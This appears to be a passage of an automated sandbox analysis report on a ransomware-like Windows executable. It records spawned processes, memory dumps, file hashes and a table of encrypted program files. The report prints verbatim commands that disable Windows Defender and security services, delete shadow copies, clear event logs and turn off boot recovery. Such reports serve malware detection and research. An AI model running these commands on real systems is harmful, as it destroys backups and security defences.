| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
"C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/1884-54-0x0000000000000000-mapping.dmp
memory/460-55-0x0000000000000000-mapping.dmp
memory/1312-56-0x0000000000000000-mapping.dmp
memory/1256-57-0x0000000000000000-mapping.dmp
memory/1832-58-0x0000000000000000-mapping.dmp
memory/1348-59-0x0000000000000000-mapping.dmp
memory/1272-60-0x0000000000000000-mapping.dmp
memory/1820-61-0x0000000000000000-mapping.dmp
memory/864-62-0x0000000000000000-mapping.dmp
memory/1976-63-0x0000000000000000-mapping.dmp
memory/1972-64-0x0000000000000000-mapping.dmp
memory/1960-65-0x0000000000000000-mapping.dmp
memory/1356-66-0x0000000000000000-mapping.dmp
memory/1552-67-0x0000000000000000-mapping.dmp
memory/1616-68-0x0000000000000000-mapping.dmp
memory/744-69-0x0000000000000000-mapping.dmp
memory/1640-70-0x0000000000000000-mapping.dmp
memory/968-71-0x0000000000000000-mapping.dmp
memory/1472-72-0x0000000000000000-mapping.dmp
memory/1736-73-0x0000000000000000-mapping.dmp
memory/1056-74-0x0000000000000000-mapping.dmp
memory/1216-75-0x0000000000000000-mapping.dmp
memory/1672-76-0x0000000000000000-mapping.dmp
memory/904-77-0x0000000000000000-mapping.dmp
memory/1704-78-0x0000000000000000-mapping.dmp
memory/1596-79-0x0000000000000000-mapping.dmp
memory/1644-80-0x0000000000000000-mapping.dmp
memory/460-81-0x0000000000000000-mapping.dmp
memory/1320-82-0x0000000000000000-mapping.dmp
memory/1688-83-0x0000000000000000-mapping.dmp
memory/1132-84-0x0000000000000000-mapping.dmp
memory/392-85-0x0000000000000000-mapping.dmp
memory/432-86-0x0000000000000000-mapping.dmp
memory/1944-87-0x0000000000000000-mapping.dmp
memory/1488-88-0x0000000000000000-mapping.dmp
memory/2040-89-0x0000000000000000-mapping.dmp
memory/1164-90-0x0000000000000000-mapping.dmp
memory/1724-91-0x0000000000000000-mapping.dmp
memory/760-92-0x0000000000000000-mapping.dmp
memory/816-93-0x0000000000000000-mapping.dmp
memory/1328-94-0x0000000000000000-mapping.dmp
memory/1904-95-0x0000000000000000-mapping.dmp
memory/1404-96-0x0000000000000000-mapping.dmp
memory/664-97-0x0000000000000000-mapping.dmp
memory/1676-98-0x0000000000000000-mapping.dmp
memory/1140-99-0x0000000000000000-mapping.dmp
memory/1976-100-0x0000000000000000-mapping.dmp
memory/1032-101-0x0000000000000000-mapping.dmp
memory/1636-102-0x0000000000000000-mapping.dmp
memory/1612-103-0x0000000000000000-mapping.dmp
memory/1580-104-0x0000000000000000-mapping.dmp
memory/568-105-0x0000000000000000-mapping.dmp
memory/1768-106-0x0000000000000000-mapping.dmp
memory/1712-107-0x0000000000000000-mapping.dmp
memory/1604-108-0x0000000000000000-mapping.dmp
memory/516-109-0x0000000000000000-mapping.dmp
memory/1812-110-0x0000000000000000-mapping.dmp
memory/1960-111-0x0000000000000000-mapping.dmp
memory/1480-112-0x0000000000000000-mapping.dmp
memory/1480-113-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp
memory/1908-114-0x0000000000000000-mapping.dmp
memory/1408-116-0x0000000000000000-mapping.dmp
memory/276-118-0x0000000000000000-mapping.dmp
memory/1660-119-0x0000000000000000-mapping.dmp
memory/556-120-0x0000000000000000-mapping.dmp
memory/1840-124-0x0000000002352000-0x0000000002354000-memory.dmp
memory/1840-123-0x0000000002350000-0x0000000002352000-memory.dmp
memory/1840-125-0x0000000002354000-0x0000000002357000-memory.dmp
memory/1840-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
memory/1840-126-0x000000000235B000-0x000000000237A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 1b9d07fbbb8d5c47ecb6b0a710d962d7 |
| SHA1 | b890276d079e5c11cbbdc7059d49be19d05a62de |
| SHA256 | 15c61e4b39e64d2726daf765d11fdbcfa708c84f657e526d54281f370fd441bb |
| SHA512 | 23a55aa7bc512ee4a7ec8e3f575e3f0826f75141e9a9502e20cc7832ba4011d820c593b451bb468cb4c3652d61d37f414b640b7c5fb2dfe037c92922a02e41ac |
memory/2096-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
memory/2096-130-0x000000001B790000-0x000000001BA8F000-memory.dmp
memory/2096-132-0x0000000002882000-0x0000000002884000-memory.dmp
memory/2096-133-0x0000000002884000-0x0000000002887000-memory.dmp
memory/2096-134-0x000000000288B000-0x00000000028AA000-memory.dmp
memory/2096-131-0x0000000002880000-0x0000000002882000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:29
Reported
2022-01-13 13:34
Platform
win10-en-20211208
Max time kernel
20s
Max time network
143s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\System\ado\adovbs.inc | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-ES\InputPersonalization.exe.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HAtrjrleLto0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD__kMAQggZMjg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.security.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Y8rcwHMMJMc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_t002nTsWoyM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\delete.avi | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\hwrusash.dat | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsdeu.xml | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Hz9Q7pnT8DI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_OlxUl-6lO_E0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_63giSdWhICc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_5qsc9VZ495w0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_NlukQsWVv2E0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eo.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_ySQX5PTCFDU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ja-JP\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\localedata.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_7ifGsyBsf5k0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_0mD4Vhi5_700.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_x1-r5Y7ZPf80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_kMZaGAh98BA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_AKhJYQCwcLo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado25.tlb | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_rsAV8NSzsHA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Rh7QysK8WQI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_tUspdsyBgZ80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_6HO7C4wUomk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_GG2IwIw7AP80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_-E9K7bim78s0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_cra7ndQHUEw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_DQSpc2yhtlQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_wXMcF_S2EOQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_l9GT7ETAy0Q0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_IA66k765kn40.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_5EgAOFRnZPw0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ru.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_aN0h3tCUm840.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Green Bubbles.htm | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\TipRes.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\NOTICE.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_mZvAfeCuP3g0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_AV9mZ_nhJjE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_o1DhEets4fc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
